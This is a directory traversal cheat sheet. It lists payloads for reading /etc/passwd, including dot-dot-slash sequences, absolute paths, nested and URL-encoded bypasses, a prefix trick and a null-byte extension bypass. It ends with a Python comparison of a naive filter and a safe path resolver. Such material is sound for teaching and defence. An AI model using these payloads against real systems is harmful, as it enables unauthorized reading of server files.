# Directory traversal

> A directory traversal attack exploits insufficient security validation or sanitization of user-supplied file names, such that characters representing "traverse to parent directory" are passed through to the operating system's file system API.
>
> \-- [*Wikipedia*](https://en.wikipedia.org/wiki/Directory_traversal_attack)

* [PortSwigger - Web Security Academy - Directory traversal](https://portswigger.net/web-security/file-path-traversal)

## Attacks

### Traversal sequence (dot dot slash)

For each `../` you step up one directory. Just repeat this until you are in the root directory and then build up the path to the desired file from there.

```url
../../../etc/passwd
```

### Absolute path

Sometimes you can just supply an absolute path.

```url
/etc/passwd
```

### Bypass filters

#### Nested traversal sequences

When the traversal sequence is only stripped once and not recursively, you can use nested sequences, so that after the inner one is stripped a traversal sequence still remains: `....//` becomes `../`.

```url
....//....//....//etc/passwd
```

#### URL encoding

Single URL encoding

```url
%2e%2e%2f
```

Double URL encoding (the `%` character is itself encoded, as `%25`)

```url
%252e%252e%252f
```

Non-standard encodings

```url
..%c0%af
..%ef%bc%8f
```

#### Mandatory prefix

If the app checks for a specific prefix, you may still be able to add traversal sequences to the file path.

```url
/var/www/images/../../../etc/passwd
```

#### Null byte termination

E.g. if the app checks for certain file extensions, you may be able to bypass the filter by supplying a null byte `%00`, which terminates the string early.

```url
../../../etc/passwd%00.jpg
```
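The bypasses above all target filters that inspect the user's spelling of a path instead of the path the operating system will actually open. As an added example (not from the original cheat sheet), the Python below puts a naive single-pass strip filter next to a canonicalize-then-check resolver and runs the page's own probes through both; `BASE_DIR` is an assumed sample web root.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Constructed sample (assumption): the only directory the file handler may serve.
BASE_DIR = "/var/www/images"


def naive_resolve(user_path: str) -> str:
    """The weak filter this page targets: '../' is removed in one pass
    (not recursively) *before* the framework URL-decodes the value.
    Returns the path the handler would go on to open."""
    stripped = user_path.replace("../", "")      # "....//" collapses to "../"
    decoded = unquote(stripped)                  # "%2e%2e%2f" only now becomes "../"
    # os.path.join discards BASE_DIR when the second argument is absolute.
    return os.path.normpath(os.path.join(BASE_DIR, decoded))


def safe_resolve(user_path: str) -> Optional[str]:
    """Decode, reject what cannot be a legitimate relative name, canonicalize,
    then verify the result still lies inside BASE_DIR. Returns None on rejection."""
    decoded = unquote(user_path)
    if "\x00" in decoded:                        # a null byte would truncate the name
        return None
    if os.path.isabs(decoded):                   # absolute paths, including prefix tricks
        return None
    base = os.path.realpath(BASE_DIR)
    # realpath collapses every '..' (and symlinks), so the containment check
    # below sees the path the OS would open, not the user's spelling of it.
    resolved = os.path.realpath(os.path.join(base, decoded))
    if os.path.commonpath([base, resolved]) != base:
        return None
    return resolved


if __name__ == "__main__":
    for probe in ("....//....//....//etc/passwd",
                  "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd",
                  "/etc/passwd",
                  "../../../etc/passwd%00.jpg",
                  "cat.jpg"):
        print(f"{probe!r:45} naive={naive_resolve(probe)!r} safe={safe_resolve(probe)!r}")
```

Note that the nested-sequence probe is accepted by `safe_resolve`: after canonicalization `....` is just a literal directory name under the web root, which is exactly the point of checking the resolved path rather than the input.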
